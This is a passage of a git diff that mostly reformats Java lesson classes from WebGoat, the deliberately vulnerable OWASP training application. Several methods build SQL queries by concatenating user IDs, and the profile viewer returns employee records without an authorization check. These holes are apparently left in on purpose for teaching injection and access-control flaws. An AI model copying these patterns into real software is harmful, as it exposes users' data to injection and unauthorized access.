+				PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query,
+																					ResultSet.TYPE_SCROLL_INSENSITIVE,
+																					ResultSet.CONCUR_READ_ONLY);
 
+				ps.setString(1, employee.getFirstName());
+				ps.setString(2, employee.getLastName());
+				ps.setString(3, employee.getSsn());
+				ps.setString(4, employee.getTitle());
+				ps.setString(5, employee.getPhoneNumber());
+				ps.setString(6, employee.getAddress1());
+				ps.setString(7, employee.getAddress2());
+				ps.setInt(8, employee.getManager());
+				ps.setString(9, employee.getStartDate());
+				ps.setString(10, employee.getCcn());
+				ps.setInt(11, employee.getCcnLimit());
+				ps.setString(12, employee.getPersonalDescription());
+				ps.setInt(13, subjectId);
+				ps.execute();
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error updating employee profile");
+				sqle.printStackTrace();
+			}
+
+		} catch (Exception e)
+		{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+		}
 	}
-	catch (Exception e)
+
+	public void changeEmployeeProfile_BACKUP(WebSession s, int userId, int subjectId, Employee employee)
+			throws UnauthorizedException
 	{
-	    s.setMessage("Error updating employee profile");
-	    e.printStackTrace();
-	}
-    }
+		try
+		{
+			// Note: The password field is ONLY set by ChangePassword
+			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+					+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+					+ " personal_description = ? WHERE userid = ?;";
+			try
+			{
+				PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query,
+																					ResultSet.TYPE_SCROLL_INSENSITIVE,
+																					ResultSet.CONCUR_READ_ONLY);
 
-    protected int getNextUID(WebSession s)
-    {
-	int uid = -1;
-	try
+				ps.setString(1, employee.getFirstName());
+				ps.setString(2, employee.getLastName());
+				ps.setString(3, employee.getSsn());
+				ps.setString(4, employee.getTitle());
+				ps.setString(5, employee.getPhoneNumber());
+				ps.setString(6, employee.getAddress1());
+				ps.setString(7, employee.getAddress2());
+				ps.setInt(8, employee.getManager());
+				ps.setString(9, employee.getStartDate());
+				ps.setString(10, employee.getCcn());
+				ps.setInt(11, employee.getCcnLimit());
+				ps.setString(12, employee.getPersonalDescription());
+				ps.setInt(13, subjectId);
+				ps.executeUpdate(query);
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error updating employee profile");
+				sqle.printStackTrace();
+			}
+
+		} catch (Exception e)
+		{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+		}
+	}
+
+	protected int getNextUID(WebSession s)
 	{
-	    Statement statement = WebSession.getConnection(s).createStatement(
-		    ResultSet.TYPE_SCROLL_INSENSITIVE,
-		    ResultSet.CONCUR_READ_ONLY);
-	    ResultSet results = statement
-		    .executeQuery("select max(userid) as uid from employee");
-	    results.first();
-	    uid = results.getInt("uid");
+		int uid = -1;
+		try
+		{
+			Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																				ResultSet.CONCUR_READ_ONLY);
+			ResultSet results = statement.executeQuery("select max(userid) as uid from employee");
+			results.first();
+			uid = results.getInt("uid");
+		} catch (SQLException sqle)
+		{
+			sqle.printStackTrace();
+			s.setMessage("Error updating employee profile");
+		} catch (ClassNotFoundException e)
+		{
+			// TODO Auto-generated catch block
+			e.printStackTrace();
+		}
+		return uid + 1;
 	}
-	catch (SQLException sqle)
+
+	public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException
 	{
-	    sqle.printStackTrace();
-	    s.setMessage("Error updating employee profile");
+		try
+		{
+			// FIXME: Cannot choose the id because we cannot guarantee uniqueness
+			int nextId = getNextUID(s);
+			String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+
+			// System.out.println("Query: " + query);
+
+			try
+			{
+				PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+
+				ps.setString(1, employee.getFirstName().toLowerCase());
+				ps.setString(2, employee.getLastName());
+				ps.setString(3, employee.getSsn());
+				ps.setString(4, employee.getTitle());
+				ps.setString(5, employee.getPhoneNumber());
+				ps.setString(6, employee.getAddress1());
+				ps.setString(7, employee.getAddress2());
+				ps.setInt(8, employee.getManager());
+				ps.setString(9, employee.getStartDate());
+				ps.setString(10, employee.getCcn());
+				ps.setInt(11, employee.getCcnLimit());
+				ps.setString(12, employee.getDisciplinaryActionDate());
+				ps.setString(13, employee.getDisciplinaryActionNotes());
+				ps.setString(14, employee.getPersonalDescription());
+
+				ps.execute();
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error updating employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+		}
 	}
-	catch (ClassNotFoundException e)
-	{
-	    // TODO Auto-generated catch block
-	    e.printStackTrace();
-	}
-	return uid + 1;
-    }
-
-    public void createEmployeeProfile(WebSession s, int userId,
-	    Employee employee) throws UnauthorizedException
-    {
-	try
-	{
-		    // FIXME: Cannot choose the id because we cannot guarantee uniqueness
-			int nextId = getNextUID(s);
-		    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
-
-	    //System.out.println("Query:  " + query);
-
-	    try
-	    {
-			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
-
-			ps.setString(1, employee.getFirstName().toLowerCase());
-			ps.setString(2, employee.getLastName());
-			ps.setString(3, employee.getSsn());
-			ps.setString(4, employee.getTitle());
-			ps.setString(5, employee.getPhoneNumber());
-			ps.setString(6, employee.getAddress1());
-			ps.setString(7, employee.getAddress2());
-			ps.setInt(8, employee.getManager());
-			ps.setString(9, employee.getStartDate());
-			ps.setString(10, employee.getCcn());
-			ps.setInt(11, employee.getCcnLimit());
-			ps.setString(12, employee.getDisciplinaryActionDate());
-			ps.setString(13, employee.getDisciplinaryActionNotes());
-			ps.setString(14, employee.getPersonalDescription());
-
-			ps.execute();
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error updating employee profile");
-			sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error updating employee profile");
-		    e.printStackTrace();
-	}
-    }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java
index 7ad8c8aad..2476a83e0 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.RoleBasedAccessControl;
 
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.session.Employee;
@@ -12,219 +12,179 @@ import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class ViewProfile extends DefaultLessonAction
 {
 
-    public ViewProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName)
-    {
-	super(lesson, lessonName, actionName);
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	if (isAuthenticated(s))
+	public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + RoleBasedAccessControl.USER_ID);
-	    int employeeId = -1;
-	    try
-	    {
-		// User selected employee
-		employeeId = s.getParser().getIntParameter(
-			RoleBasedAccessControl.EMPLOYEE_ID);
-	    }
-	    catch (ParameterNotFoundException e)
-	    {
-		// May be an internally selected employee
-		employeeId = getIntRequestAttribute(s, getLessonName() + "."
-			+ RoleBasedAccessControl.EMPLOYEE_ID);
-	    }
-
-	    Employee employee = getEmployeeProfile(s, userId, employeeId);
-	    setSessionAttribute(s, getLessonName() + "."
-		    + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		super(lesson, lessonName, actionName);
 	}
-	else
-	    throw new UnauthenticatedException();
 
-	updateLessonStatus(s);
-    }
-
-
-    private void updateLessonStatus(WebSession s)
-    {
-	// If the logged in user is not authorized to see the given employee's data, stage is complete.
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + RoleBasedAccessControl.USER_ID);
-	    int employeeId = s.getParser().getIntParameter(
-		    RoleBasedAccessControl.EMPLOYEE_ID);
+		getLesson().setCurrentAction(s, getActionName());
 
-	    if (RoleBasedAccessControl.STAGE3.equals(getStage(s))
-		    && !isAuthorizedForEmployee(s, userId, employeeId))
-	    {
-		setStageComplete(s, RoleBasedAccessControl.STAGE3);
-	    }
-	}
-	catch (ParameterNotFoundException e)
-	{}
-    }
-
-
-    public String getNextPage(WebSession s)
-    {
-	return RoleBasedAccessControl.VIEWPROFILE_ACTION;
-    }
-
-
-    public Employee getEmployeeProfile(WebSession s, int userId,
-	    int subjectUserId) throws UnauthorizedException
-    {
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
-	{
-	    String query = "SELECT * FROM employee WHERE userid = "
-		    + subjectUserId;
-
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		if (answer_results.next())
+		if (isAuthenticated(s))
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
+			int employeeId = -1;
+			try
+			{
+				// User selected employee
+				employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
+			} catch (ParameterNotFoundException e)
+			{
+				// May be an internally selected employee
+				employeeId = getIntRequestAttribute(s, getLessonName() + "." + RoleBasedAccessControl.EMPLOYEE_ID);
+			}
+
+			Employee employee = getEmployeeProfile(s, userId, employeeId);
+			setSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		}
+		else
+			throw new UnauthenticatedException();
+
+		updateLessonStatus(s);
 	}
 
-	return profile;
-    }
-
-
-    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId,
-	    int subjectUserId) throws UnauthorizedException
-    {
-	// Query the database to determine if the given employee is owned by the given user
-	// Query the database for the profile data of the given employee
-
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
+	private void updateLessonStatus(WebSession s)
 	{
-	    String query = "SELECT * FROM employee WHERE userid = "
-		    + subjectUserId;
-
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		if (answer_results.next())
+		// If the logged in user is not authorized to see the given employee's data, stage is
+		// complete.
+		try
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
+			int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
+
+			if (RoleBasedAccessControl.STAGE3.equals(getStage(s)) && !isAuthorizedForEmployee(s, userId, employeeId))
+			{
+				setStageComplete(s, RoleBasedAccessControl.STAGE3);
+			}
+		} catch (ParameterNotFoundException e)
+		{
+		}
 	}
 
-	return profile;
-    }
+	public String getNextPage(WebSession s)
+	{
+		return RoleBasedAccessControl.VIEWPROFILE_ACTION;
+	}
+
+	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
+	{
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
+		{
+			String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
+	}
+
+	public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
+	{
+		// Query the database to determine if the given employee is owned by the given user
+		// Query the database for the profile data of the given employee
+
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
+		{
+			String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java
index c66b050e1..9a45bb7bd 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.SQLInjection;
 
 import java.sql.ResultSet;
@@ -5,7 +6,6 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.List;
 import java.util.Vector;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.session.EmployeeStub;
@@ -14,162 +14,143 @@ import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class ListStaff extends DefaultLessonAction
 {
 
-    public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
-    {
-	super(lesson, lessonName, actionName);
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	if (isAuthenticated(s))
+	public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + SQLInjection.USER_ID);
-
-	    List employees = getAllEmployees(s, userId);
-	    setSessionAttribute(s, getLessonName() + "."
-		    + SQLInjection.STAFF_ATTRIBUTE_KEY, employees);
+		super(lesson, lessonName, actionName);
 	}
-	else
-	    throw new UnauthenticatedException();
-    }
 
-
-    public String getNextPage(WebSession s)
-    {
-	return SQLInjection.LISTSTAFF_ACTION;
-    }
-
-
-    public List getAllEmployees(WebSession s, int userId)
-	    throws UnauthorizedException
-    {
-	// Query the database for all employees "owned" by the given employee
-
-	List<EmployeeStub> employees = new Vector<EmployeeStub>();
-
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException
 	{
-	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
-		    + "(SELECT employee_id FROM ownership WHERE employer_id = "
-		    + userId + ")";
+		getLesson().setCurrentAction(s, getActionName());
 
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		answer_results.beforeFirst();
-		while (answer_results.next())
+		if (isAuthenticated(s))
 		{
-		    int employeeId = answer_results.getInt("userid");
-		    String firstName = answer_results.getString("first_name");
-		    String lastName = answer_results.getString("last_name");
-		    String role = answer_results.getString("role");
-		    //System.out.println("Retrieving employee stub for role " + role);
-		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
-			    lastName, role);
-		    employees.add(stub);
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + SQLInjection.USER_ID);
+
+			List employees = getAllEmployees(s, userId);
+			setSessionAttribute(s, getLessonName() + "." + SQLInjection.STAFF_ATTRIBUTE_KEY, employees);
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employees");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employees");
-	    e.printStackTrace();
+		else
+			throw new UnauthenticatedException();
 	}
 
-	return employees;
-    }
-
-
-    public List getAllEmployees_BACKUP(WebSession s, int userId)
-	    throws UnauthorizedException
-    {
-	// Query the database for all employees "owned" by the given employee
-
-	List<EmployeeStub> employees = new Vector<EmployeeStub>();
-
-	try
+	public String getNextPage(WebSession s)
 	{
-	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
-		    + "(SELECT employee_id FROM ownership WHERE employer_id = "
-		    + userId + ")";
+		return SQLInjection.LISTSTAFF_ACTION;
+	}
 
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		answer_results.beforeFirst();
-		while (answer_results.next())
+	public List getAllEmployees(WebSession s, int userId) throws UnauthorizedException
+	{
+		// Query the database for all employees "owned" by the given employee
+
+		List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+		try
 		{
-		    int employeeId = answer_results.getInt("userid");
-		    String firstName = answer_results.getString("first_name");
-		    String lastName = answer_results.getString("last_name");
-		    String role = answer_results.getString("role");
-		    //System.out.println("Retrieving employee stub for role " + role);
-		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
-			    lastName, role);
-		    employees.add(stub);
+			String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
+					+ "(SELECT employee_id FROM ownership WHERE employer_id = " + userId + ")";
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				answer_results.beforeFirst();
+				while (answer_results.next())
+				{
+					int employeeId = answer_results.getInt("userid");
+					String firstName = answer_results.getString("first_name");
+					String lastName = answer_results.getString("last_name");
+					String role = answer_results.getString("role");
+					// System.out.println("Retrieving employee stub for role " + role);
+					EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
+					employees.add(stub);
+				}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employees");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employees");
+			e.printStackTrace();
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employees");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employees");
-	    e.printStackTrace();
+
+		return employees;
 	}
 
-	return employees;
-    }
+	public List getAllEmployees_BACKUP(WebSession s, int userId) throws UnauthorizedException
+	{
+		// Query the database for all employees "owned" by the given employee
+
+		List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+		try
+		{
+			String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
+					+ "(SELECT employee_id FROM ownership WHERE employer_id = " + userId + ")";
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				answer_results.beforeFirst();
+				while (answer_results.next())
+				{
+					int employeeId = answer_results.getInt("userid");
+					String firstName = answer_results.getString("first_name");
+					String lastName = answer_results.getString("last_name");
+					String role = answer_results.getString("role");
+					// System.out.println("Retrieving employee stub for role " + role);
+					EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
+					employees.add(stub);
+				}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employees");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employees");
+			e.printStackTrace();
+		}
+
+		return employees;
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java
index 7cdbf5c0b..a6acb8f78 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.SQLInjection;
 
 import java.sql.ResultSet;
@@ -5,7 +6,6 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.List;
 import java.util.Vector;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
@@ -16,282 +16,243 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
